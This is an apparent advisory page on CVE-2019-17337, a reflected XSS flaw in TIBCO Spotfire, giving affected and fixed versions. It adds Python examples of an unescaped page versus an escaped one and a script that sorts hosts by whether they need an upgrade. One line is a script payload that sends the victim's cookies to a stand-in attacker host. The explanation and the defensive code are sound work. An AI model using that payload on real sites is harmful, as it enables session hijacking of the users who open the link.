
CVE-2019-17337 : Vulnerability Insights and Analysis

CVE-2019-17337 is a reflected cross-site scripting (XSS) vulnerability in the Spotfire library component of TIBCO Spotfire Analytics Platform for AWS Marketplace and TIBCO Spotfire Server. This page summarizes the affected versions, the impact TIBCO assigns to the flaw, and the fixed releases to move to.

Understanding CVE-2019-17337

What is CVE-2019-17337?

The Spotfire library component of TIBCO Spotfire Analytics Platform for AWS Marketplace and TIBCO Spotfire Server does not adequately neutralize attacker-controlled input before reflecting it into a web page, which allows a reflected cross-site scripting (XSS) attack.

The Impact of CVE-2019-17337

According to the vendor, a successful attack could give the attacker full administrative access to the web interface of the affected component. In practice this means the injected script runs in the browser of whichever user opens the crafted link; if that user is logged in as an administrator, the script acts with the administrator's session and privileges.

Technical Details of CVE-2019-17337

Vulnerability Description

The flaw is in the Spotfire library component. It is a reflected XSS: the malicious payload arrives in the request (typically as a parameter of a crafted URL) and is echoed back into the response page without sufficient output encoding, so the victim's browser executes it as part of the trusted Spotfire page. Nothing is stored on the server; each victim has to be lured into opening the attacker's link.

Affected Systems and Versions

        TIBCO Spotfire Analytics Platform for AWS Marketplace: version 10.6.0
        TIBCO Spotfire Server: versions 7.11.7 and below; 7.12.0; 7.13.0; 7.14.0; 10.0.0 through 10.6.0

Exploitation Mechanism

An attacker crafts a URL to the affected component that carries script in a parameter the Spotfire library component reflects into its response. When a victim who is authenticated to Spotfire opens that URL (for example from a phishing email or a link planted on another site), the server echoes the script into the page and the victim's browser executes it in the Spotfire origin, with access to that user's session. The attack requires user interaction, and its value to the attacker scales with the privileges of the user who is tricked.
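The following is an added illustration of the mechanism described above, not code from TIBCO Spotfire or from this page: a minimal search page that reflects a query parameter straight into HTML, the same page with HTML entity encoding at the output boundary, the lure URL an attacker would send, and the check a tester runs to tell the two apart (does the probe's markup come back verbatim?). The host name, endpoint path and parameter name "q" are assumptions for the example.

```python
import html
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed example (not Spotfire code): hypothetical endpoint and parameter.
BASE = "https://spotfire.example/search"
PAYLOAD = "<script>fetch('https://attacker.example/?c='+document.cookie)</script>"


def render_vulnerable(query: str) -> str:
    """Reflects user input into HTML unchanged: a reflected XSS sink."""
    return f"<html><body><p>No results for: {query}</p></body></html>"


def render_fixed(query: str) -> str:
    """Same page, but the input is entity-encoded for an HTML text context.
    quote=True also encodes quotes, so the value is safe inside attributes too."""
    return f"<html><body><p>No results for: {html.escape(query, quote=True)}</p></body></html>"


def attacker_link(base_url: str, payload: str) -> str:
    """The URL a victim is lured into opening. The payload travels in the request;
    nothing is stored server-side, which is what makes the XSS 'reflected'."""
    return f"{base_url}?{urlencode({'q': payload})}"


def handle_request(url: str, render) -> str:
    """Simulates the server: parse the query string and render the page."""
    params = parse_qs(urlparse(url).query)
    return render(params.get("q", [""])[0])


def reflects_unencoded(body: str, probe: str) -> bool:
    """Tester's check: the probe (with its < > ' characters) appears verbatim
    in the response, so the input reaches the HTML parser intact."""
    return probe in body


if __name__ == "__main__":
    link = attacker_link(BASE, PAYLOAD)
    print("lure URL:", link)
    print("vulnerable page reflects script:",
          reflects_unencoded(handle_request(link, render_vulnerable), PAYLOAD))
    print("fixed page reflects script:",
          reflects_unencoded(handle_request(link, render_fixed), PAYLOAD))
```

The fix is context-specific: `html.escape` is correct for an HTML text or attribute context, but input landing inside a `<script>` block, a URL or a CSS value needs the encoding for that context instead.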

Mitigation and Prevention

Immediate Steps to Take

        Update TIBCO Spotfire Analytics Platform for AWS Marketplace to version 10.6.1 or later
        Update TIBCO Spotfire Server versions 7.11.7 and below to version 7.11.8 or later
        Update TIBCO Spotfire Server versions 7.12.0 through 10.3.4 to version 10.3.5 or later
        Update TIBCO Spotfire Server versions 10.4.0 through 10.6.0 to version 10.6.1 or later
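When several Spotfire Server installations are in play, the remediation steps above are easiest to apply from an inventory. The script below is an added example, not a TIBCO tool: it encodes the affected ranges and target releases exactly as listed on this page and reports, for each host, whether it needs an upgrade and to which release. The inventory lines are constructed, and the AWS Marketplace range covers only the single version this page lists (10.6.0).

```python
import csv
import io

# Affected ranges (inclusive bounds) and the release to move to, taken from the
# remediation steps above. "0.0.0" stands in for "and below".
SERVER_RANGES = [
    ("0.0.0", "7.11.7", "7.11.8"),
    ("7.12.0", "10.3.4", "10.3.5"),
    ("10.4.0", "10.6.0", "10.6.1"),
]
# The AWS Marketplace platform has one affected release listed on this page.
AWS_RANGES = [("10.6.0", "10.6.0", "10.6.1")]


def parse_version(v: str) -> tuple:
    """'10.3.4' -> (10, 3, 4). Shorter strings are padded with zeros so that
    '10.6' compares as 10.6.0 rather than as a shorter tuple."""
    parts = [int(p) for p in v.strip().split(".")]
    return tuple(parts + [0] * (3 - len(parts)))


def required_fix(product: str, version: str):
    """Return the fixed release for an affected version, or None if the
    version is outside every affected range (already patched, or unlisted)."""
    ranges = SERVER_RANGES if product == "server" else AWS_RANGES
    v = parse_version(version)
    for low, high, fix in ranges:
        if parse_version(low) <= v <= parse_version(high):
            return fix
    return None


# Constructed inventory (hypothetical hosts), one row per installation.
INVENTORY = """host,product,version
bi-prod-01,server,7.11.5
bi-prod-02,server,10.3.4
bi-prod-03,server,10.3.5
bi-dev-01,server,10.6.0
bi-aws-01,aws,10.6.0
bi-aws-02,aws,10.6.1
"""


def triage(inventory_csv: str) -> list:
    """Return (host, current version, required fix) for every affected row."""
    findings = []
    for row in csv.DictReader(io.StringIO(inventory_csv)):
        fix = required_fix(row["product"], row["version"])
        if fix is not None:
            findings.append((row["host"], row["version"], fix))
    return findings


if __name__ == "__main__":
    for host, current, fix in triage(INVENTORY):
        print(f"{host}: {current} is affected by CVE-2019-17337, upgrade to {fix}")
```

A version that is not in any listed range returns `None`; treat that as "not listed on this page", not as proof of safety, and confirm against the vendor advisory for releases newer than the ones summarized here.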

Long-Term Security Practices

        Regularly monitor and apply security patches
        Conduct security assessments and penetration testing

Patching and Updates

TIBCO has released fixed versions of both the Spotfire Analytics Platform for AWS Marketplace and Spotfire Server; the target release depends on the version branch currently installed, as listed under Immediate Steps to Take above. After upgrading, confirm the running version on each instance rather than relying on the inventory record.
